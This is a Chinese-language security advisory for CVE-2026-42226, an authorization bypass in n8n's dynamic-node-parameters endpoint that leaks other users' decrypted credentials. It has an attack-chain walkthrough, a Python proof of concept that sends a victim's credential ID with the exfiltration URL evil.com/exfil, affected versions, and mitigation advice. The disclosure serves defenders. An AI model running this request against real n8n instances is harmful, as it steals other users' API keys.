CVE-2026-42226 CVSS 7.5 高危

CVE-2026-42226 n8n权限绕过漏洞导致凭证泄露

披露日期: 2026-05-04

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-42226

漏洞类型

权限绕过

CVSS评分

7.5 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

n8n

漏洞概述

n8n开源工作流自动化平台存在高危权限绕过漏洞。由于动态节点参数端点未验证凭证引用的授权，攻击者可通过共享工作流注入他人凭证ID，诱使后端向攻击者服务器解密并发送凭证，导致敏感API密钥泄露。

技术细节

该漏洞位于n8n的`dynamic-node-parameters`接口中。系统在处理动态节点参数时，仅验证了用户是否登录，却未校验请求体中提供的`credentialId`是否归属于当前用户。攻击者利用这一逻辑缺陷，可以构造包含他人高权限凭证ID及恶意回调URL的请求。服务器收到请求后，会解密该凭证并尝试向恶意URL发起验证请求。这使得攻击者能够利用服务端身份进行SSRF攻击，从而窃取其他用户的API密钥。该漏洞影响所有通过该机制解析凭证的节点。

攻击链分析

STEP 1

1. 获取访问权限

攻击者注册或获取n8n平台的普通用户账号，并访问平台内的共享工作流。

STEP 2

2. 识别目标凭证

攻击者通过枚举或推断，确定想要窃取的凭证ID（例如管理员的API Key ID）。

STEP 3

3. 构造恶意请求

攻击者向`dynamic-node-parameters`端点发送请求，在请求体中注入受害者的凭证ID，并将目标URL设置为攻击者控制的服务器地址。

STEP 4

4. 服务端解析与泄露

n8n后端接收到请求，由于未校验凭证归属，解密了受害者的凭证，并向攻击者控制的服务器发起连接。

STEP 5

5. 窃取凭证

攻击者在其服务器日志中捕获到请求，从而获取到解密后的敏感认证信息（API Key等）。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# Target instance
target = "https://target-n8n-instance.com"
endpoint = "/rest/dynamic-node-parameters"

# Attacker's server to receive the leaked credential
attacker_server = "https://evil.com/exfil"

# The ID of the credential owned by the victim
victim_credential_id = "123"

headers = {
    "Content-Type": "application/json",
    "Cookie": "session_id=attacker_session_cookie"
}

# Payload exploiting the IDOR to use victim's credential
payload = {
    "nodeType": "@n8n/n8n-nodes-langchain.httpRequest",
    "operation": "get",
    "resource": "dynamic",
    "path": attacker_server, # Malicious URL
    "credentials": {
        "id": victim_credential_id, # Injecting foreign credential ID
        "name": "stolenCred"
    }
}

response = requests.post(target + endpoint, json=payload, headers=headers)

print("Request sent. Check attacker server logs for credential usage.")

影响范围

n8n < 1.123.33

n8n < 2.17.5

防御指南

临时缓解措施

建议立即升级至安全版本。如无法升级，应严格限制工作流共享功能，并对服务器的出站流量实施网络访问控制（NAC），仅允许访问受信任的IP地址。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表